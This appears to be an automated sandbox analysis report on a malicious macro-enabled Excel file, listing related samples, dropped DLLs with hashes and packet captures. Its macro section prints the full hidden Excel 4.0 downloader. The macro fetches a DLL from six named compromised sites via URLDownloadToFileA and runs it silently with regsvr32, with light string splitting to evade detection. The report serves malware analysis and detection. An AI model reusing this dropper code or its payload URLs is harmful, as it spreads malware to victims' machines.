	7D1C4ILkQI.dll	Get hash	malicious	Browse	128.199.192.135
	45pz68iNQb.dll	Get hash	malicious	Browse	128.199.192.135
	check copy.xlsm	Get hash	malicious	Browse	178.128.83.165
	check.xlsm	Get hash	malicious	Browse	178.128.83.165

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
eb88d0b3e1961a0562f006e5ce2a0b87	Message-0203.xlsm	Get hash	malicious	Browse	168.119.39.118
	report_82218.xlsm	Get hash	malicious	Browse	168.119.39.118
	WWKF_532365.xlsm	Get hash	malicious	Browse	168.119.39.118
	774-0203.xlsm	Get hash	malicious	Browse	168.119.39.118
	PACK_73.xlsm	Get hash	malicious	Browse	168.119.39.118
	10069385729969112736286.xlsm	Get hash	malicious	Browse	168.119.39.118
	2022-03-02_1322.xlsm	Get hash	malicious	Browse	168.119.39.118
	2022-03-02_0946.xlsm	Get hash	malicious	Browse	168.119.39.118
	SCAN-01032022.xlsm	Get hash	malicious	Browse	168.119.39.118
	Documents 8.xlsm	Get hash	malicious	Browse	168.119.39.118
	NOTICE_003.xlsm	Get hash	malicious	Browse	168.119.39.118
	SCAN 0103.xlsm	Get hash	malicious	Browse	168.119.39.118
	DOCUMENTO_0103.xlsm	Get hash	malicious	Browse	168.119.39.118
	info_0.xlsm	Get hash	malicious	Browse	168.119.39.118
	INFO-8084.xlsm	Get hash	malicious	Browse	168.119.39.118
	MAIL_0103.xlsm	Get hash	malicious	Browse	168.119.39.118
	File_0103.xlsm	Get hash	malicious	Browse	168.119.39.118
	Notice 28022022.xlsm	Get hash	malicious	Browse	168.119.39.118
	MES_2602.xlsm	Get hash	malicious	Browse	168.119.39.118
	Dokumentation-9879652.xlsm	Get hash	malicious	Browse	168.119.39.118

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\uVyr9TJj[1].dll

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	1028096
Entropy (8bit):	6.289672813525342
Encrypted:	false
SSDEEP:	12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQE5tFjNRLU:Ci6fgcIcHB8ZvbLU
MD5:	6D9B4B8A970AC42657253423A7FB7A2C
SHA1:	3AE3BBE0458C921CE1EFB157C931C70B1000B476
SHA-256:	3F30FA743780159E5B31669C66F40A21EDEAB7394B06323187A39B7C3A093CC3
SHA-512:	F9642CD2D9317A4FE3D0B72EFF44C64F779A6F75244A254CB260C3B752A12D4124B74DEC8FE1F00F02A2E63BFA6470DE934900FF9E9A2BE1BE783FBB44A42842
Malicious:	true
IE Cache URL:	http://gymsportive.com/0zwe/pSiUh/
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nF..nF..nF9.1F..nF9.3F..nF..oF..nF.4.F..nF.4.Fv.nF.4.F[.nF.4.F..nF.4.F..nF..nF..nF.4.F..nFRich..nF........................PE..L....~.b...........!.....`..........'........p.......................................................................{...............P.......................P......................................w..@....................@..@....................text....P.......`.................. ..`.rdata..K....p.......p..............@..@.data............@..................@....idata...?.......@..................@....didat.......@......................@....rsrc........P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E829263A.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 2415 x 64, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	29560
Entropy (8bit):	7.903149132963418
Encrypted:	false
SSDEEP:	768:lzdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+UW:JtT5fTR4Lh1NisFYBc3cr+UW
MD5:	5BAB80911CB5E910D18D366B360C7B4B
SHA1:	D40007FEC139A200DE1A3B84774C81AD28321B63
SHA-256:	E5191E67B0C6E3EA75AE1E6ED836B0124F21E16FD087B6C3475FD54E71B547D5
SHA-512:	46B338ECE9FDEB79EF3F5758F3433EB966D9149ED1C3F6BAAD48E76DB79DF24994294089D66B7AEE5BAC14366A4C7D3F98E17EBCBFBBA65B45B01EDD1597D2FC
Malicious:	false
Preview:	.PNG........IHDR...o...@........Q....sRGB.........gAMA......a.....pHYs..!...!........s.IDATx^.wX....].d$.....TT..1....s@E...`....s...0..vWWwM.k.?.w.W=......_=..#...5..U..vU...v.....................Q.&.................... .........................l"............................................x.&.................... .........................l"............................................x.......C..........!?.>-...A.....W.54W4.o..`.B......................s..6......ZY.p#.r.r...A.Kf.-.\|.pbp!.w..e.K..-..R..ZW]L.Bo.......................?..j..6..d...Z..D.?K.v....N.._....m.........................'..O.&...v..X..2....K"b.iet...=........................6.m+#-...T..#.&.*.x.,;..]+Ch.......................~.M...-&.60.[.$.1).pID..d.&......................~8?.&...z.Z..EB^.{..V\|....L.....................?..h._4.E....J\z.<..V.........,.. J..../.."....................H~.M..`&.....f..Y....?\|.......<......0.8+..."t\....................z..e..J.k#.&.X@!..b.........X.....&.J(.(x.[.7

C:\Users\user\Desktop\~$DETAILS-0203.xlsm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\sei.ocx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1028096
Entropy (8bit):	6.289672813525342
Encrypted:	false
SSDEEP:	12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQE5tFjNRLU:Ci6fgcIcHB8ZvbLU
MD5:	6D9B4B8A970AC42657253423A7FB7A2C
SHA1:	3AE3BBE0458C921CE1EFB157C931C70B1000B476
SHA-256:	3F30FA743780159E5B31669C66F40A21EDEAB7394B06323187A39B7C3A093CC3
SHA-512:	F9642CD2D9317A4FE3D0B72EFF44C64F779A6F75244A254CB260C3B752A12D4124B74DEC8FE1F00F02A2E63BFA6470DE934900FF9E9A2BE1BE783FBB44A42842
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nF..nF..nF9.1F..nF9.3F..nF..oF..nF.4.F..nF.4.Fv.nF.4.F[.nF.4.F..nF.4.F..nF..nF..nF.4.F..nFRich..nF........................PE..L....~.b...........!.....`..........'........p.......................................................................{...............P.......................P......................................w..@....................@..@....................text....P.......`.................. ..`.rdata..K....p.......p..............@..@.data............@..................@....idata...?.......@..................@....didat.......@......................@....rsrc........P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx (copy)

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1028096
Entropy (8bit):	6.289672813525342
Encrypted:	false
SSDEEP:	12288:+LDlVD0Fj+g1dEJgcIzQHBKeWZlQE5tFjNRLU:Ci6fgcIcHB8ZvbLU
MD5:	6D9B4B8A970AC42657253423A7FB7A2C
SHA1:	3AE3BBE0458C921CE1EFB157C931C70B1000B476
SHA-256:	3F30FA743780159E5B31669C66F40A21EDEAB7394B06323187A39B7C3A093CC3
SHA-512:	F9642CD2D9317A4FE3D0B72EFF44C64F779A6F75244A254CB260C3B752A12D4124B74DEC8FE1F00F02A2E63BFA6470DE934900FF9E9A2BE1BE783FBB44A42842
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............nF..nF..nF9.1F..nF9.3F..nF..oF..nF.4.F..nF.4.Fv.nF.4.F[.nF.4.F..nF.4.F..nF..nF..nF.4.F..nFRich..nF........................PE..L....~.b...........!.....`..........'........p.......................................................................{...............P.......................P......................................w..@....................@..@....................text....P.......`.................. ..`.rdata..K....p.......p..............@..@.data............@..................@....idata...?.......@..................@....didat.......@......................@....rsrc........P......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................

Static File Info

General

File type:	Microsoft Excel 2007+
Entropy (8bit):	7.732822009162956
TrID:	Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52% Excel Microsoft Office Open XML Format document (40004/1) 40.40% ZIP compressed archive (8000/1) 8.08%
File name:	DETAILS-0203.xlsm
File size:	47652
MD5:	a631b56f4ee5aad96d39106f3c13439b
SHA1:	0ad16f468aaee7a3076776937d3d3394fc1aea12
SHA256:	1d1835e4149e0a89055436c2e98297dafa7d903da42ec5db6b8ba33bffa4f41d
SHA512:	4d15951a907736106699ce4eb5bae135f9dd822eab7b743c30f6d036ca8019b39dcffce0a4461d6a9cc087ad462e0eb3668b7723aa175f08ef7e0b284c55cbc6
SSDEEP:	768:8dolODOevZCwrvtMezdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VfNN/u:6oIDHtT5fTR4Lh1NisFYBc3cr+UqVfNw
File Content Preview:	PK..........!.5.x.....e.......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:	OpenXML
Number of OLE Files:	1

OLE File "DETAILS-0203.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

Name:	Je1
Type:	3
Final:	False
Visible:	False
Protected:	False
Je13False0Falsepre16,3,=CHAR("101")

Name:	Je2
Type:	3
Final:	False
Visible:	False
Protected:	False
Je23False0Falsepost5,4,e

Name:	EFALGV
Type:	4
Final:	False
Visible:	False
Protected:	False
EFALGV4False0Falsepost6,3,=FORMULA("e","e")=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)",D10)=FORMULA("=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))",D12)=FORMULA("=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))",D14)=FORMULA("=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))",D16)=FORMULA("=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))",D18)=FORMULA("=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))",D20)=FORMULA("=IF(GFGH6<0, CLOSE(0),)",D22)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")",D24)=FORMULA("=RETURN()",D33)9,3,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)11,3,=IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))13,3,=IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))15,3,=IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))17,3,=IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))19,3,=IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))21,3,=IF(GFGH6<0, CLOSE(0),)23,3,=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")32,3,=RETURN()

Name:	EFALGV
Type:	4
Final:	False
Visible:	False
Protected:	False
EFALGV4False0Falsepre6,3,=FORMULA("e",'Je2'!E6)=FORMULA("=CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://gymsportive.com/0zwe/pSiUh/","..\sei.ocx",0,0)",D10)=FORMULA("=IF(GFGH1<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://danialteb.com/wp-admin/NqRYgwPERRPoTs/","..\sei.ocx",0,0))",D12)=FORMULA("=IF(GFGH2<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://totalplaytuxtla.com/sitio/IduhreKcPbD/","..\sei.ocx",0,0))",D14)=FORMULA("=IF(GFGH3<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://skanev.com/wp-content/AT5Doj207guJES0BMk/","..\sei.ocx",0,0))",D16)=FORMULA("=IF(GFGH4<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://praachichemfood.com/old-files==-/vo68ZI/","..\sei.ocx",0,0))",D18)=FORMULA("=IF(GFGH5<0, CALL("urlmon","URLDownloadToFil"&'Je2'!E6&"A","JJCCBB",0,"http://curtistreeclimbing.com/css/2oFtx1t5P8qcVKnCl/","..\sei.ocx",0,0))",D20)=FORMULA("=IF(GFGH6<0, CLOSE(0),)",D22)=FORMULA("=EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx")",D24)=FORMULA("=RETURN()",D33)

Name:	Je1
Type:	3
Final:	False
Visible:	False
Protected:	False
Je13False0Falsepost16,3,=CHAR("101")

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 2, 2022 16:16:54.904575109 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:54.962815046 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:16:54.962981939 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:54.964171886 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:55.262532949 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:55.871170998 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:57.087965012 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:58.305175066 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:16:59.506289005 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.289176941 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289205074 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289222956 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289241076 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289259911 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289285898 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289356947 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.289594889 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289618969 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289637089 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289654016 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.289659977 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.289680958 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.289705038 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.289710045 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.340045929 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.432679892 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.432843924 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:00.670769930 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.903191090 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:00.903398037 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:01.403281927 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:01.403458118 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:01.571456909 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:01.571620941 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:02.567858934 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:02.568121910 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:02.721097946 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:02.721261978 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:03.786139011 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:03.786290884 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:04.812275887 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:04.812494993 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:04.931152105 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:04.931374073 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.499425888 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499461889 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499488115 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499510050 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499531984 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499556065 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499578953 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499600887 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.499680042 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.499838114 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.500885010 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.500915051 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.500937939 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.500957966 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.500967026 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.500981092 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.500989914 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.500997066 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.501013994 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.514978886 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.651871920 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.651912928 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:05.651948929 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:05.651997089 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:06.543093920 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:06.543245077 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:10.784641027 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.784678936 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.784704924 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.784746885 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:10.784761906 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.784780025 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:10.784785986 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.784802914 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:10.784853935 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:10.801343918 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.801384926 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.801533937 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.801639080 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:10.917175055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.917203903 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:10.917378902 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.050976992 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.051219940 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.234838963 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.234869003 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.234883070 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235050917 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235074043 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235097885 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235105991 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235122919 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235141993 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235186100 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235271931 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235325098 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235333920 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235358000 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235359907 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235383034 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235405922 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235413074 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235434055 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235455990 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235475063 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235475063 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235516071 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235574961 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235632896 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.235645056 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.235676050 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.236013889 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.254568100 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254612923 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254625082 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254642010 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254801035 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.254846096 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254894018 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254910946 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254947901 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.254976988 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.254976988 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.254996061 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.255008936 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.255048037 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.255584002 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.301475048 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.301522970 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.301553965 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.301594019 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.301667929 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.301688910 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:16.301733017 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:16.301745892 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.474719048 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.474910021 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.628721952 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628756046 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628781080 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628798008 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628814936 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628827095 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628839970 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628851891 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628959894 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.628962040 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.629002094 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.629040956 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.629091978 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629122019 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629141092 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629158974 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629179955 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629199028 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629201889 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.629218102 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.629229069 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.629268885 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.629962921 CET	49167	80	192.168.2.22	212.64.200.154
Mar 2, 2022 16:17:21.812571049 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812633038 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812719107 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812755108 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812792063 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812828064 CET	80	49167	212.64.200.154	192.168.2.22
Mar 2, 2022 16:17:21.812838078 CET	49167	80	192.168.2.22	212.64.200.154
